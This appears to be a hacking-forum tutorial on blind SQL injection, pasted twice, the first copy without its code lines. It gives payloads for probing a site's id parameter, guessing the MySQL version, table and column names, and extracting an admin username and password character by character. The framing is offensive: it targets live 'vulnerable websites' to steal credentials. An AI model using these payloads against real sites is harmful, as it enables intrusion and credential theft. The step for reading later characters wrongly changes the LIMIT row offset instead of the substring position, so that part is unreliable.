Intro
Well, this is it, my 3rd tutorial.
I hope you'll like it
Prologue
This is the 2nd level (in logic counting) for sql injections.
If you don't know basic sqli yet, I recommend you to read this tutorial first: http://www.hackforums.net/showthread.php?tid=1234781
--
Step 1 Finding Vulnerabilities
Well, as you know from my first tutorial, a vulnerable website has security holes. Therefore we will take this test website:
To find out if it's vulnerable we will undergo a little test.
For that we will add some strings. As everybody knows the number 1 is equal to 1. But not to 2.
Therefore we will compare these two websites:
If "and 1=1" loads perfectly, but "1=2" is missing some content, the website is vulnerable.
However, if they both load without missing content, it is not vulnerable.
Step 2 Finding The Mysql Version
This isn't very much of use in this kind of injection, but it might be useful.
To find it out, you'll have to 'guess' the version.
It's either 4 or 5.
To find it out do this:
If one of them is loading without missing any content, it's that version.
(You can do the same with the database name and user)
Step 3 Guessing The Table Names.
As you can see guessing is important in blind sqli. That's also needed for the table and it's columns :p
To get the right table you'll have to guess it this way:
Suppose we've got this:
Step 4 Guessing The Columns In A Table.
We will now guess the columns in this certain table (example = admin).
Do this:
This is an example:
Suppose we've found a username and a password column in the table admin.
Step 5 Extracting Information From The Columns
Note: You can do the same with some tools.
But I prefer to do it manually.
For this we have to put the syntax in ascii and guess it's char.
Note that each time you'll do this, you'll get 1 letter.
Do this:
Suppose that we've guessed 70. The website then loads normally. That means that the number must be higher.
Keep guessing until the website will load with some content missing.
So that means the first number that would load false after a number that would load true, is the right char.
Suppose that it's 85.
The example would be:
To get the first letter of username:password you'll have to use a asscii table.
Here is one: http://www.asciitable.com/index/asciifull.gif
Navigate to the found char (which is "dec" in the ascii table) and lookup the "chr".
That means that the char from the example (85) is the capital letter U.
To find the 2nd letter and higher you will have to change the underlined number in the syntax:
You'll notice when you'll get to the end when (number),1 isn't giving any information anymore.
Suppose we've now found that the username:password = UserAdmin:BagelJuice
--
Outro
Thank you very much for reading this tutorial. If there are any questions, or you feel like I forgot something, please don't mind to post it here.
Also please report any grammatical errors, as I try to dodge them.
I hope I helped you with this thread
~BioShock
Well, this is it, my 3rd tutorial.
I hope you'll like it
Prologue
This is the 2nd level (in logic counting) for sql injections.
If you don't know basic sqli yet, I recommend you to read this tutorial first: http://www.hackforums.net/showthread.php?tid=1234781
--
Step 1 Finding Vulnerabilities
Well, as you know from my first tutorial, a vulnerable website has security holes. Therefore we will take this test website:
Code:
site.com/index.php?id=1To find out if it's vulnerable we will undergo a little test.
For that we will add some strings. As everybody knows the number 1 is equal to 1. But not to 2.
Therefore we will compare these two websites:
Code:
site.com/index.php?id=1 and 1=1
and
site.com/index.php?id=1 and 1=2If "and 1=1" loads perfectly, but "1=2" is missing some content, the website is vulnerable.
However, if they both load without missing content, it is not vulnerable.
Step 2 Finding The Mysql Version
This isn't very much of use in this kind of injection, but it might be useful.
To find it out, you'll have to 'guess' the version.
It's either 4 or 5.
To find it out do this:
Code:
site.com/index.php?id=1 and substring(@@version,1,1)=5
or
site.com/index.php?id=1 and substring(@@version,1,1)=4(You can do the same with the database name and user)
Step 3 Guessing The Table Names.
As you can see guessing is important in blind sqli. That's also needed for the table and it's columns :p
To get the right table you'll have to guess it this way:
Quote:site.com/index.php?id=1 and (select 1 from insert table here limit 0,1)=1Insert your guessed table in the underlined part. If the website is loading without content missing, then the table exists.
Suppose we've got this:
Code:
site.com/index.php?id=1 and (select 1 from admin limit 0,1)=1Step 4 Guessing The Columns In A Table.
We will now guess the columns in this certain table (example = admin).
Do this:
Quote:site.com/index.php?id=1 and (select substring(concat(1,guessed column),1,1) from table limit 0,1)=1
This is an example:
Code:
site.com/index.php?id=1 and (select substring(concat(1,username),1,1) from admin limit 0,1)=1Suppose we've found a username and a password column in the table admin.
Step 5 Extracting Information From The Columns
Note: You can do the same with some tools.
But I prefer to do it manually.
For this we have to put the syntax in ascii and guess it's char.
Note that each time you'll do this, you'll get 1 letter.
Do this:
Quote:site.com/index.php?id=1 and ascii(substring((select concat(column 1,0x3a,column 2) from table limit 0,1),1,1))>char number
Suppose that we've guessed 70. The website then loads normally. That means that the number must be higher.
Keep guessing until the website will load with some content missing.
So that means the first number that would load false after a number that would load true, is the right char.
Suppose that it's 85.
The example would be:
Code:
site.com/index.php?id=1 and ascii(substring((select concat(username,0x3a,password) from admin limit 0,1),1,1))>85To get the first letter of username:password you'll have to use a asscii table.
Here is one: http://www.asciitable.com/index/asciifull.gif
Navigate to the found char (which is "dec" in the ascii table) and lookup the "chr".
That means that the char from the example (85) is the capital letter U.
To find the 2nd letter and higher you will have to change the underlined number in the syntax:
Quote:site.com/index.php?id=1 and ascii(substring((select concat(username,0x3a,password) from admin limit 1,1),1,1))>(char)
change to
site.com/index.php?id=1 and ascii(substring((select concat(username,0x3a,password) from admin limit 2,1),1,1))>(char)
site.com/index.php?id=1 and ascii(substring((select concat(username,0x3a,password) from admin limit 3,1),1,1))>(char)
etc.
You'll notice when you'll get to the end when (number),1 isn't giving any information anymore.
Suppose we've now found that the username:password = UserAdmin:BagelJuice
--
Outro
Thank you very much for reading this tutorial. If there are any questions, or you feel like I forgot something, please don't mind to post it here.
Also please report any grammatical errors, as I try to dodge them.
I hope I helped you with this thread
~BioShock
Categories:
sql injection
